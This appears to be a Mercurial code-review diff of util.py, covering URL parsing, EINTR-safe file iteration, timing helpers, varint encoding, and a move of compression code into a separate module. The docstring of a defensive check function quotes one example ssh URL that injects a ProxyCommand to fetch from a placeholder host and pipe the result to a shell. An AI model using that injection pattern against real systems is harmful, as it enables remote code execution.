2537 if pycompat.oslinesep == '\r\n':
2538 tonativeeol = tocrlf
2539 fromnativeeol = tolf
2540 nativeeolwriter = _crlfwriter
2541 else:
2542 tonativeeol = pycompat.identity
2543 fromnativeeol = pycompat.identity
2544 nativeeolwriter = pycompat.identity
2545
2546 if (pyplatform.python_implementation() == 'CPython' and
2547 sys.version_info < (3, 0)):
2548 # There is an issue in CPython that some IO methods do not handle EINTR
2549 # correctly. The following table shows what CPython version (and functions)
2550 # are affected (buggy: has the EINTR bug, okay: otherwise):
2551 #
2552 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2553 # --------------------------------------------------
2554 # fp.__iter__ | buggy | buggy | okay
2555 # fp.read* | buggy | okay [1] | okay
2556 #
2557 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2558 #
2559 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2560 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2561 #
2562 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2563 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2564 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2565 # fp.__iter__ but not other fp.read* methods.
2566 #
2567 # On modern systems like Linux, the "read" syscall cannot be interrupted
2568 # when reading "fast" files like on-disk files. So the EINTR issue only
2569 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2570 # files approximately as "fast" files and use the fast (unsafe) code path,
2571 # to minimize the performance impact.
2572 if sys.version_info >= (2, 7, 4):
2573 # fp.readline deals with EINTR correctly, use it as a workaround.
2574 def _safeiterfile(fp):
2575 return iter(fp.readline, '')
2576 else:
2577 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2578 # note: this may block longer than necessary because of bufsize.
2579 def _safeiterfile(fp, bufsize=4096):
2580 fd = fp.fileno()
2581 line = ''
2582 while True:
2583 try:
2584 buf = os.read(fd, bufsize)
2585 except OSError as ex:
2586 # os.read only raises EINTR before any data is read
2587 if ex.errno == errno.EINTR:
2588 continue
2589 else:
2590 raise
2591 line += buf
2592 if '\n' in buf:
2593 splitted = line.splitlines(True)
2594 line = ''
2595 for l in splitted:
2596 if l[-1] == '\n':
2597 yield l
2598 else:
2599 line = l
2600 if not buf:
2601 break
2602 if line:
2603 yield line
2604
2605 def iterfile(fp):
2606 fastpath = True
2607 if type(fp) is file:
2608 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2609 if fastpath:
2610 return fp
2611 else:
2612 return _safeiterfile(fp)
2613 else:
2614 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2615 def iterfile(fp):
2616 return fp
2617
2618 def iterlines(iterator):
2619 for chunk in iterator:
2620 for line in chunk.splitlines():
2621 yield line
2622
2623 def expandpath(path):
2624 return os.path.expanduser(os.path.expandvars(path))
2625
2626 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2627 """Return the result of interpolating items in the mapping into string s.
2628
2629 prefix is a single character string, or a two character string with
2630 a backslash as the first character if the prefix needs to be escaped in
2631 a regular expression.
2632
2633 fn is an optional function that will be applied to the replacement text
2634 just before replacement.
2635
2636 escape_prefix is an optional flag that allows using doubled prefix for
2637 its escaping.
2638 """
2639 fn = fn or (lambda s: s)
2640 patterns = '|'.join(mapping.keys())
2641 if escape_prefix:
2642 patterns += '|' + prefix
2643 if len(prefix) > 1:
2644 prefix_char = prefix[1:]
2645 else:
2646 prefix_char = prefix
2647 mapping[prefix_char] = prefix_char
2648 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2649 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2650
2651 def getport(port):
2652 """Return the port for a given network service.
2653
2654 If port is an integer, it's returned as is. If it's a string, it's
2655 looked up using socket.getservbyname(). If there's no matching
2656 service, error.Abort is raised.
2657 """
2658 try:
2659 return int(port)
2660 except ValueError:
2661 pass
2662
2663 try:
2664 return socket.getservbyname(pycompat.sysstr(port))
2665 except socket.error:
2666 raise error.Abort(_("no port number associated with service '%s'")
2667 % port)
2668
2669 class url(object):
2670 r"""Reliable URL parser.
2671
2672 This parses URLs and provides attributes for the following
2673 components:
2674
2675 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2676
2677 Missing components are set to None. The only exception is
2678 fragment, which is set to '' if present but empty.
2679
2680 If parsefragment is False, fragment is included in query. If
2681 parsequery is False, query is included in path. If both are
2682 False, both fragment and query are included in path.
2683
2684 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2685
2686 Note that for backward compatibility reasons, bundle URLs do not
2687 take host names. That means 'bundle://../' has a path of '../'.
2688
2689 Examples:
2690
2691 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2692 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2693 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2694 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2695 >>> url(b'file:///home/joe/repo')
2696 <url scheme: 'file', path: '/home/joe/repo'>
2697 >>> url(b'file:///c:/temp/foo/')
2698 <url scheme: 'file', path: 'c:/temp/foo/'>
2699 >>> url(b'bundle:foo')
2700 <url scheme: 'bundle', path: 'foo'>
2701 >>> url(b'bundle://../foo')
2702 <url scheme: 'bundle', path: '../foo'>
2703 >>> url(br'c:\foo\bar')
2704 <url path: 'c:\\foo\\bar'>
2705 >>> url(br'\\blah\blah\blah')
2706 <url path: '\\\\blah\\blah\\blah'>
2707 >>> url(br'\\blah\blah\blah#baz')
2708 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2709 >>> url(br'file:///C:\users\me')
2710 <url scheme: 'file', path: 'C:\\users\\me'>
2711
2712 Authentication credentials:
2713
2714 >>> url(b'ssh://joe:xyz@x/repo')
2715 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2716 >>> url(b'ssh://joe@x/repo')
2717 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2718
2719 Query strings and fragments:
2720
2721 >>> url(b'http://host/a?b#c')
2722 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2723 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2724 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2725
2726 Empty path:
2727
2728 >>> url(b'')
2729 <url path: ''>
2730 >>> url(b'#a')
2731 <url path: '', fragment: 'a'>
2732 >>> url(b'http://host/')
2733 <url scheme: 'http', host: 'host', path: ''>
2734 >>> url(b'http://host/#a')
2735 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2736
2737 Only scheme:
2738
2739 >>> url(b'http:')
2740 <url scheme: 'http'>
2741 """
2742
2743 _safechars = "!~*'()+"
2744 _safepchars = "/!~*'()+:\\"
2745 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2746
2747 def __init__(self, path, parsequery=True, parsefragment=True):
2748 # We slowly chomp away at path until we have only the path left
2749 self.scheme = self.user = self.passwd = self.host = None
2750 self.port = self.path = self.query = self.fragment = None
2751 self._localpath = True
2752 self._hostport = ''
2753 self._origpath = path
2754
2755 if parsefragment and '#' in path:
2756 path, self.fragment = path.split('#', 1)
2757
2758 # special case for Windows drive letters and UNC paths
2759 if hasdriveletter(path) or path.startswith('\\\\'):
2760 self.path = path
2761 return
2762
2763 # For compatibility reasons, we can't handle bundle paths as
2764 # normal URLS
2765 if path.startswith('bundle:'):
2766 self.scheme = 'bundle'
2767 path = path[7:]
2768 if path.startswith('//'):
2769 path = path[2:]
2770 self.path = path
2771 return
2772
2773 if self._matchscheme(path):
2774 parts = path.split(':', 1)
2775 if parts[0]:
2776 self.scheme, path = parts
2777 self._localpath = False
2778
2779 if not path:
2780 path = None
2781 if self._localpath:
2782 self.path = ''
2783 return
2784 else:
2785 if self._localpath:
2786 self.path = path
2787 return
2788
2789 if parsequery and '?' in path:
2790 path, self.query = path.split('?', 1)
2791 if not path:
2792 path = None
2793 if not self.query:
2794 self.query = None
2795
2796 # // is required to specify a host/authority
2797 if path and path.startswith('//'):
2798 parts = path[2:].split('/', 1)
2799 if len(parts) > 1:
2800 self.host, path = parts
2801 else:
2802 self.host = parts[0]
2803 path = None
2804 if not self.host:
2805 self.host = None
2806 # path of file:///d is /d
2807 # path of file:///d:/ is d:/, not /d:/
2808 if path and not hasdriveletter(path):
2809 path = '/' + path
2810
2811 if self.host and '@' in self.host:
2812 self.user, self.host = self.host.rsplit('@', 1)
2813 if ':' in self.user:
2814 self.user, self.passwd = self.user.split(':', 1)
2815 if not self.host:
2816 self.host = None
2817
2818 # Don't split on colons in IPv6 addresses without ports
2819 if (self.host and ':' in self.host and
2820 not (self.host.startswith('[') and self.host.endswith(']'))):
2821 self._hostport = self.host
2822 self.host, self.port = self.host.rsplit(':', 1)
2823 if not self.host:
2824 self.host = None
2825
2826 if (self.host and self.scheme == 'file' and
2827 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2828 raise error.Abort(_('file:// URLs can only refer to localhost'))
2829
2830 self.path = path
2831
2832 # leave the query string escaped
2833 for a in ('user', 'passwd', 'host', 'port',
2834 'path', 'fragment'):
2835 v = getattr(self, a)
2836 if v is not None:
2837 setattr(self, a, urlreq.unquote(v))
2838
2839 @encoding.strmethod
2840 def __repr__(self):
2841 attrs = []
2842 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2843 'query', 'fragment'):
2844 v = getattr(self, a)
2845 if v is not None:
2846 attrs.append('%s: %r' % (a, pycompat.bytestr(v)))
2847 return '<url %s>' % ', '.join(attrs)
2848
2849 def __bytes__(self):
2850 r"""Join the URL's components back into a URL string.
2851
2852 Examples:
2853
2854 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2855 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2856 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2857 'http://user:pw@host:80/?foo=bar&baz=42'
2858 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2859 'http://user:pw@host:80/?foo=bar%3dbaz'
2860 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2861 'ssh://user:pw@[::1]:2200//home/joe#'
2862 >>> bytes(url(b'http://localhost:80//'))
2863 'http://localhost:80//'
2864 >>> bytes(url(b'http://localhost:80/'))
2865 'http://localhost:80/'
2866 >>> bytes(url(b'http://localhost:80'))
2867 'http://localhost:80/'
2868 >>> bytes(url(b'bundle:foo'))
2869 'bundle:foo'
2870 >>> bytes(url(b'bundle://../foo'))
2871 'bundle:../foo'
2872 >>> bytes(url(b'path'))
2873 'path'
2874 >>> bytes(url(b'file:///tmp/foo/bar'))
2875 'file:///tmp/foo/bar'
2876 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2877 'file:///c:/tmp/foo/bar'
2878 >>> print(url(br'bundle:foo\bar'))
2879 bundle:foo\bar
2880 >>> print(url(br'file:///D:\data\hg'))
2881 file:///D:\data\hg
2882 """
2883 if self._localpath:
2884 s = self.path
2885 if self.scheme == 'bundle':
2886 s = 'bundle:' + s
2887 if self.fragment:
2888 s += '#' + self.fragment
2889 return s
2890
2891 s = self.scheme + ':'
2892 if self.user or self.passwd or self.host:
2893 s += '//'
2894 elif self.scheme and (not self.path or self.path.startswith('/')
2895 or hasdriveletter(self.path)):
2896 s += '//'
2897 if hasdriveletter(self.path):
2898 s += '/'
2899 if self.user:
2900 s += urlreq.quote(self.user, safe=self._safechars)
2901 if self.passwd:
2902 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2903 if self.user or self.passwd:
2904 s += '@'
2905 if self.host:
2906 if not (self.host.startswith('[') and self.host.endswith(']')):
2907 s += urlreq.quote(self.host)
2908 else:
2909 s += self.host
2910 if self.port:
2911 s += ':' + urlreq.quote(self.port)
2912 if self.host:
2913 s += '/'
2914 if self.path:
2915 # TODO: similar to the query string, we should not unescape the
2916 # path when we store it, the path might contain '%2f' = '/',
2917 # which we should *not* escape.
2918 s += urlreq.quote(self.path, safe=self._safepchars)
2919 if self.query:
2920 # we store the query in escaped form.
2921 s += '?' + self.query
2922 if self.fragment is not None:
2923 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2924 return s
2925
2926 __str__ = encoding.strmethod(__bytes__)
2927
2928 def authinfo(self):
2929 user, passwd = self.user, self.passwd
2930 try:
2931 self.user, self.passwd = None, None
2932 s = bytes(self)
2933 finally:
2934 self.user, self.passwd = user, passwd
2935 if not self.user:
2936 return (s, None)
2937 # authinfo[1] is passed to urllib2 password manager, and its
2938 # URIs must not contain credentials. The host is passed in the
2939 # URIs list because Python < 2.4.3 uses only that to search for
2940 # a password.
2941 return (s, (None, (s, self.host),
2942 self.user, self.passwd or ''))
2943
2944 def isabs(self):
2945 if self.scheme and self.scheme != 'file':
2946 return True # remote URL
2947 if hasdriveletter(self.path):
2948 return True # absolute for our purposes - can't be joined()
2949 if self.path.startswith(br'\\'):
2950 return True # Windows UNC path
2951 if self.path.startswith('/'):
2952 return True # POSIX-style
2953 return False
2954
2955 def localpath(self):
2956 if self.scheme == 'file' or self.scheme == 'bundle':
2957 path = self.path or '/'
2958 # For Windows, we need to promote hosts containing drive
2959 # letters to paths with drive letters.
2960 if hasdriveletter(self._hostport):
2961 path = self._hostport + '/' + self.path
2962 elif (self.host is not None and self.path
2963 and not hasdriveletter(path)):
2964 path = '/' + path
2965 return path
2966 return self._origpath
2967
2968 def islocal(self):
2969 '''whether localpath will return something that posixfile can open'''
2970 return (not self.scheme or self.scheme == 'file'
2971 or self.scheme == 'bundle')
2972
2973 def hasscheme(path):
2974 return bool(url(path).scheme)
2975
2976 def hasdriveletter(path):
2977 return path and path[1:2] == ':' and path[0:1].isalpha()
2978
2979 def urllocalpath(path):
2980 return url(path, parsequery=False, parsefragment=False).localpath()
2981
2982 def checksafessh(path):
2983 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2984
2985 This is a sanity check for ssh urls. ssh will parse the first item as
2986 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2987 Let's prevent these potentially exploited urls entirely and warn the
2988 user.
2989
2990 Raises an error.Abort when the url is unsafe.
2991 """
2992 path = urlreq.unquote(path)
2993 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
2994 raise error.Abort(_('potentially unsafe url: %r') %
2995 (pycompat.bytestr(path),))
2996
2997 def hidepassword(u):
2998 '''hide user credential in a url string'''
2999 u = url(u)
3000 if u.passwd:
3001 u.passwd = '***'
3002 return bytes(u)
3003
3004 def removeauth(u):
3005 '''remove all authentication information from a url string'''
3006 u = url(u)
3007 u.user = u.passwd = None
3008 return bytes(u)
3009
3010 timecount = unitcountfn(
3011 (1, 1e3, _('%.0f s')),
3012 (100, 1, _('%.1f s')),
3013 (10, 1, _('%.2f s')),
3014 (1, 1, _('%.3f s')),
3015 (100, 0.001, _('%.1f ms')),
3016 (10, 0.001, _('%.2f ms')),
3017 (1, 0.001, _('%.3f ms')),
3018 (100, 0.000001, _('%.1f us')),
3019 (10, 0.000001, _('%.2f us')),
3020 (1, 0.000001, _('%.3f us')),
3021 (100, 0.000000001, _('%.1f ns')),
3022 (10, 0.000000001, _('%.2f ns')),
3023 (1, 0.000000001, _('%.3f ns')),
3024 )
3025
3026 @attr.s
3027 class timedcmstats(object):
3028 """Stats information produced by the timedcm context manager on entering."""
3029
3030 # the starting value of the timer as a float (meaning and resulution is
3031 # platform dependent, see util.timer)
3032 start = attr.ib(default=attr.Factory(lambda: timer()))
3033 # the number of seconds as a floating point value; starts at 0, updated when
3034 # the context is exited.
3035 elapsed = attr.ib(default=0)
3036 # the number of nested timedcm context managers.
3037 level = attr.ib(default=1)
3038
3039 def __bytes__(self):
3040 return timecount(self.elapsed) if self.elapsed else '<unknown>'
3041
3042 __str__ = encoding.strmethod(__bytes__)
3043
3044 @contextlib.contextmanager
3045 def timedcm(whencefmt, *whenceargs):
3046 """A context manager that produces timing information for a given context.
3047
3048 On entering a timedcmstats instance is produced.
3049
3050 This context manager is reentrant.
3051
3052 """
3053 # track nested context managers
3054 timedcm._nested += 1
3055 timing_stats = timedcmstats(level=timedcm._nested)
3056 try:
3057 with tracing.log(whencefmt, *whenceargs):
3058 yield timing_stats
3059 finally:
3060 timing_stats.elapsed = timer() - timing_stats.start
3061 timedcm._nested -= 1
3062
3063 timedcm._nested = 0
3064
3065 def timed(func):
3066 '''Report the execution time of a function call to stderr.
3067
3068 During development, use as a decorator when you need to measure
3069 the cost of a function, e.g. as follows:
3070
3071 @util.timed
3072 def foo(a, b, c):
3073 pass
3074 '''
3075
3076 def wrapper(*args, **kwargs):
3077 with timedcm(pycompat.bytestr(func.__name__)) as time_stats:
3078 result = func(*args, **kwargs)
3079 stderr = procutil.stderr
3080 stderr.write('%s%s: %s\n' % (
3081 ' ' * time_stats.level * 2, pycompat.bytestr(func.__name__),
3082 time_stats))
3083 return result
3084 return wrapper
3085
3086 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3087 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3088
3089 def sizetoint(s):
3090 '''Convert a space specifier to a byte count.
3091
3092 >>> sizetoint(b'30')
3093 30
3094 >>> sizetoint(b'2.2kb')
3095 2252
3096 >>> sizetoint(b'6M')
3097 6291456
3098 '''
3099 t = s.strip().lower()
3100 try:
3101 for k, u in _sizeunits:
3102 if t.endswith(k):
3103 return int(float(t[:-len(k)]) * u)
3104 return int(t)
3105 except ValueError:
3106 raise error.ParseError(_("couldn't parse size: %s") % s)
3107
3108 class hooks(object):
3109 '''A collection of hook functions that can be used to extend a
3110 function's behavior. Hooks are called in lexicographic order,
3111 based on the names of their sources.'''
3112
3113 def __init__(self):
3114 self._hooks = []
3115
3116 def add(self, source, hook):
3117 self._hooks.append((source, hook))
3118
3119 def __call__(self, *args):
3120 self._hooks.sort(key=lambda x: x[0])
3121 results = []
3122 for source, hook in self._hooks:
3123 results.append(hook(*args))
3124 return results
3125
3126 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
3127 '''Yields lines for a nicely formatted stacktrace.
3128 Skips the 'skip' last entries, then return the last 'depth' entries.
3129 Each file+linenumber is formatted according to fileline.
3130 Each line is formatted according to line.
3131 If line is None, it yields:
3132 length of longest filepath+line number,
3133 filepath+linenumber,
3134 function
3135
3136 Not be used in production code but very convenient while developing.
3137 '''
3138 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3139 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3140 ][-depth:]
3141 if entries:
3142 fnmax = max(len(entry[0]) for entry in entries)
3143 for fnln, func in entries:
3144 if line is None:
3145 yield (fnmax, fnln, func)
3146 else:
3147 yield line % (fnmax, fnln, func)
3148
3149 def debugstacktrace(msg='stacktrace', skip=0,
3150 f=procutil.stderr, otherf=procutil.stdout, depth=0):
3151 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3152 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3153 By default it will flush stdout first.
3154 It can be used everywhere and intentionally does not require an ui object.
3155 Not be used in production code but very convenient while developing.
3156 '''
3157 if otherf:
3158 otherf.flush()
3159 f.write('%s at:\n' % msg.rstrip())
3160 for line in getstackframes(skip + 1, depth=depth):
3161 f.write(line)
3162 f.flush()
3163
3164 class dirs(object):
3165 '''a multiset of directory names from a dirstate or manifest'''
3166
3167 def __init__(self, map, skip=None):
3168 self._dirs = {}
3169 addpath = self.addpath
3170 if safehasattr(map, 'iteritems') and skip is not None:
3171 for f, s in map.iteritems():
3172 if s[0] != skip:
3173 addpath(f)
3174 else:
3175 for f in map:
3176 addpath(f)
3177
3178 def addpath(self, path):
3179 dirs = self._dirs
3180 for base in finddirs(path):
3181 if base in dirs:
3182 dirs[base] += 1
3183 return
3184 dirs[base] = 1
3185
3186 def delpath(self, path):
3187 dirs = self._dirs
3188 for base in finddirs(path):
3189 if dirs[base] > 1:
3190 dirs[base] -= 1
3191 return
3192 del dirs[base]
3193
3194 def __iter__(self):
3195 return iter(self._dirs)
3196
3197 def __contains__(self, d):
3198 return d in self._dirs
3199
3200 if safehasattr(parsers, 'dirs'):
3201 dirs = parsers.dirs
3202
3203 def finddirs(path):
3204 pos = path.rfind('/')
3205 while pos != -1:
3206 yield path[:pos]
3207 pos = path.rfind('/', 0, pos)
3208
3209 # compression code
3210
3211 SERVERROLE = 'server'
3212 CLIENTROLE = 'client'
3213
3214 compewireprotosupport = collections.namedtuple(r'compenginewireprotosupport',
3215 (r'name', r'serverpriority',
3216 r'clientpriority'))
3217
3218 class compressormanager(object):
49 class compressormanager(object):
3219 """Holds registrations of various compression engines.
50 """Holds registrations of various compression engines.
3220
51
@@ -3764,7 +595,7 b' class _zstdengine(compressionengine):'
3764 # Not all installs have the zstd module available. So defer importing
595 # Not all installs have the zstd module available. So defer importing
3765 # until first access.
596 # until first access.
3766 try:
597 try:
3767 from . import zstd
598 from .. import zstd
3768 # Force delayed import.
599 # Force delayed import.
3769 zstd.__version__
600 zstd.__version__
3770 return zstd
601 return zstd
@@ -3914,108 +745,3 b' def bundlecompressiontopics():'
3914 return items
745 return items
3915
746
3916 i18nfunctions = bundlecompressiontopics().values()
747 i18nfunctions = bundlecompressiontopics().values()
3917
3918 # convenient shortcut
3919 dst = debugstacktrace
3920
3921 def safename(f, tag, ctx, others=None):
3922 """
3923 Generate a name that it is safe to rename f to in the given context.
3924
3925 f: filename to rename
3926 tag: a string tag that will be included in the new name
3927 ctx: a context, in which the new name must not exist
3928 others: a set of other filenames that the new name must not be in
3929
3930 Returns a file name of the form oldname~tag[~number] which does not exist
3931 in the provided context and is not in the set of other names.
3932 """
3933 if others is None:
3934 others = set()
3935
3936 fn = '%s~%s' % (f, tag)
3937 if fn not in ctx and fn not in others:
3938 return fn
3939 for n in itertools.count(1):
3940 fn = '%s~%s~%s' % (f, tag, n)
3941 if fn not in ctx and fn not in others:
3942 return fn
3943
3944 def readexactly(stream, n):
3945 '''read n bytes from stream.read and abort if less was available'''
3946 s = stream.read(n)
3947 if len(s) < n:
3948 raise error.Abort(_("stream ended unexpectedly"
3949 " (got %d bytes, expected %d)")
3950 % (len(s), n))
3951 return s
3952
3953 def uvarintencode(value):
3954 """Encode an unsigned integer value to a varint.
3955
3956 A varint is a variable length integer of 1 or more bytes. Each byte
3957 except the last has the most significant bit set. The lower 7 bits of
3958 each byte store the 2's complement representation, least significant group
3959 first.
3960
3961 >>> uvarintencode(0)
3962 '\\x00'
3963 >>> uvarintencode(1)
3964 '\\x01'
3965 >>> uvarintencode(127)
3966 '\\x7f'
3967 >>> uvarintencode(1337)
3968 '\\xb9\\n'
3969 >>> uvarintencode(65536)
3970 '\\x80\\x80\\x04'
3971 >>> uvarintencode(-1)
3972 Traceback (most recent call last):
3973 ...
3974 ProgrammingError: negative value for uvarint: -1
3975 """
3976 if value < 0:
3977 raise error.ProgrammingError('negative value for uvarint: %d'
3978 % value)
3979 bits = value & 0x7f
3980 value >>= 7
3981 bytes = []
3982 while value:
3983 bytes.append(pycompat.bytechr(0x80 | bits))
3984 bits = value & 0x7f
3985 value >>= 7
3986 bytes.append(pycompat.bytechr(bits))
3987
3988 return ''.join(bytes)
3989
3990 def uvarintdecodestream(fh):
3991 """Decode an unsigned variable length integer from a stream.
3992
3993 The passed argument is anything that has a ``.read(N)`` method.
3994
3995 >>> try:
3996 ... from StringIO import StringIO as BytesIO
3997 ... except ImportError:
3998 ... from io import BytesIO
3999 >>> uvarintdecodestream(BytesIO(b'\\x00'))
4000 0
4001 >>> uvarintdecodestream(BytesIO(b'\\x01'))
4002 1
4003 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
4004 127
4005 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
4006 1337
4007 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
4008 65536
4009 >>> uvarintdecodestream(BytesIO(b'\\x80'))
4010 Traceback (most recent call last):
4011 ...
4012 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
4013 """
4014 result = 0
4015 shift = 0
4016 while True:
4017 byte = ord(readexactly(fh, 1))
4018 result |= ((byte & 0x7f) << shift)
4019 if not (byte & 0x80):
4020 return result
4021 shift += 7
@@ -23,6 +23,7 b' from . import ('
23 )
23 )
24 from .utils import (
24 from .utils import (
25 cborutil,
25 cborutil,
26 compression,
26 interfaceutil,
27 interfaceutil,
27 )
28 )
28
29
@@ -144,7 +145,7 b' class httpv1protocolhandler(object):'
144 caps.append('httpmediatype=0.1rx,0.1tx,0.2tx')
145 caps.append('httpmediatype=0.1rx,0.1tx,0.2tx')
145
146
146 compengines = wireprototypes.supportedcompengines(repo.ui,
147 compengines = wireprototypes.supportedcompengines(repo.ui,
147 util.SERVERROLE)
148 compression.SERVERROLE)
148 if compengines:
149 if compengines:
149 comptypes = ','.join(urlreq.quote(e.wireprotosupport().name)
150 comptypes = ','.join(urlreq.quote(e.wireprotosupport().name)
150 for e in compengines)
151 for e in compengines)
@@ -320,11 +321,12 b' def _httpresponsetype(ui, proto, prefer_'
320 if '0.2' in proto.getprotocaps():
321 if '0.2' in proto.getprotocaps():
321 # All clients are expected to support uncompressed data.
322 # All clients are expected to support uncompressed data.
322 if prefer_uncompressed:
323 if prefer_uncompressed:
323 return HGTYPE2, util._noopengine(), {}
324 return HGTYPE2, compression._noopengine(), {}
324
325
325 # Now find an agreed upon compression format.
326 # Now find an agreed upon compression format.
326 compformats = wireprotov1server.clientcompressionsupport(proto)
327 compformats = wireprotov1server.clientcompressionsupport(proto)
327 for engine in wireprototypes.supportedcompengines(ui, util.SERVERROLE):
328 for engine in wireprototypes.supportedcompengines(ui,
329 compression.SERVERROLE):
328 if engine.wireprotosupport().name in compformats:
330 if engine.wireprotosupport().name in compformats:
329 opts = {}
331 opts = {}
330 level = ui.configint('server', '%slevel' % engine.name())
332 level = ui.configint('server', '%slevel' % engine.name())
@@ -18,6 +18,7 b' from . import ('
18 util,
18 util,
19 )
19 )
20 from .utils import (
20 from .utils import (
21 compression,
21 interfaceutil,
22 interfaceutil,
22 )
23 )
23
24
@@ -316,12 +317,12 b' class commanddict(dict):'
316
317
317 def supportedcompengines(ui, role):
318 def supportedcompengines(ui, role):
318 """Obtain the list of supported compression engines for a request."""
319 """Obtain the list of supported compression engines for a request."""
319 assert role in (util.CLIENTROLE, util.SERVERROLE)
320 assert role in (compression.CLIENTROLE, compression.SERVERROLE)
320
321
321 compengines = util.compengines.supportedwireengines(role)
322 compengines = compression.compengines.supportedwireengines(role)
322
323
323 # Allow config to override default list and ordering.
324 # Allow config to override default list and ordering.
324 if role == util.SERVERROLE:
325 if role == compression.SERVERROLE:
325 configengines = ui.configlist('server', 'compressionengines')
326 configengines = ui.configlist('server', 'compressionengines')
326 config = 'server.compressionengines'
327 config = 'server.compressionengines'
327 else:
328 else:
General Comments 0
You need to be logged in to leave comments. Login now